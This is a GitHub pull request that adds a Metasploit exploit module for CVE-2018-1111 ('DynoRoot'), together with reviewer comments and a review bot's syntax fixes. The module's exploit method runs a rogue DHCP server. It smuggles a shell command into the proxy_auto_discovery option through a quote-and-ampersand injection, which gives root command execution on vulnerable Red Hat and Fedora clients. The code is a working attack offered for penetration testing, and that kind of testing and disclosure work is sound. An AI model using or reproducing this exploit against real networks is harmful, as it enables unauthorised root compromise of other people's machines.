Add CVE-2018-1111 exploit #10059
Changes from 12 commits
@@ -0,0 +1,67 @@ | ||
## | ||
# This module requires Metasploit: https://metasploit.com/download | ||
# Current source: https://github.com/rapid7/metasploit-framework | ||
## | ||
|
||
class MetasploitModule < Msf::Exploit::Remote | ||
Rank = ExcellentRanking | ||
|
||
include Msf::Exploit::Remote::DHCPServer | ||
|
||
def initialize(info = {}) | ||
super(update_info(info, | ||
'Name' => 'DHCP Client Command Injection (DynoRoot)', | ||
'Description' => %q{ | ||
This module exploits the DynoRoot vulnerability, a flaw in how the | ||
NetworkManager integration script included in the DHCP client in | ||
Red Hat Enterprise Linux 6 and 7, Fedora 28, and earlier | ||
processes DHCP options. A malicious DHCP server, or an attacker on | ||
the local network able to spoof DHCP responses, could use this flaw | ||
to execute arbitrary commands with root privileges on systems using | ||
NetworkManager and configured to obtain network configuration using | ||
the DHCP protocol. | ||
}, | ||
'Author' => | ||
[ | ||
'Felix Wilhelm', # Vulnerability discovery | ||
'Kevin Kirsche <d3c3pt10n[AT]deceiveyour.team>' # Metasploit module | ||
], | ||
'License' => MSF_LICENSE, | ||
'Platform' => ['unix'], | ||
'Arch' => ARCH_CMD, | ||
'References' => | ||
'References' => | ||
Feel free to include your own PoC in this array. :)
I'd add an
Added
||
[ | ||
['CVE', '2018-1111'], | ||
['EDB': '44652'], | ||
['URL', 'https://github.com/kkirsche/CVE-2018-1111'], | ||
['URL', 'https://twitter.com/_fel1x/status/996388421273882626?lang=en'], | ||
['URL', 'https://access.redhat.com/security/vulnerabilities/3442151'], | ||
['AKA', 'DynoRoot'], | ||
['URL', 'https://dynoroot.ninja/'], | ||
['URL', 'https://nvd.nist.gov/vuln/detail/CVE-2018-1111'], | ||
['URL', 'https://www.tenable.com/blog/advisory-red-hat-dhcp-client-command-injection-trouble'], | ||
['URL', 'https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-1111'] | ||
], | ||
'PayloadType': 'cmd', | ||
This should be a hash rocket for consistency
Fixed
||
'Targets' => [ [ 'Automatic Target', { }] ], | ||
'DefaultTarget' => 0, | ||
'DisclosureDate' => 'May 15 2018' | ||
)) | ||
|
||
deregister_options('DOMAINNAME', 'HOSTNAME', 'URL', 'FILENAME') | ||
end | ||
|
||
def exploit | ||
hash = datastore.copy | ||
start_service(hash) | ||
@dhcp.set_option(proxy_auto_discovery: "#{Rex::Text.rand_text_alpha(6..12)}'&#{payload.encoded} #") | ||
|
||
begin | ||
while @dhcp.thread.alive? | ||
sleep 2 | ||
end | ||
ensure | ||
stop_service | ||
end | ||
end | ||
end |
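Review bot: the reference entry `['EDB': '44652'],` (directly under `['CVE', '2018-1111'],`) uses a colon-key literal, so Ruby builds a one-element array containing the hash `{ EDB: '44652' }` instead of the two-element `['CTX', 'value']` pair that every other entry in this array uses; it is the only entry in the list that does not follow the pair form and will not behave like the others. Change it to `['EDB', '44652'],`. The same colon syntax appears on `'PayloadType': 'cmd',`, which a reviewer has already asked to be converted to a hash rocket; once both use `=>` the info hash is consistent throughout.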
You can add a
'Privileged' => true,
key to this hash somewhere, to show off that your exploit gives remote r00t.
Fixed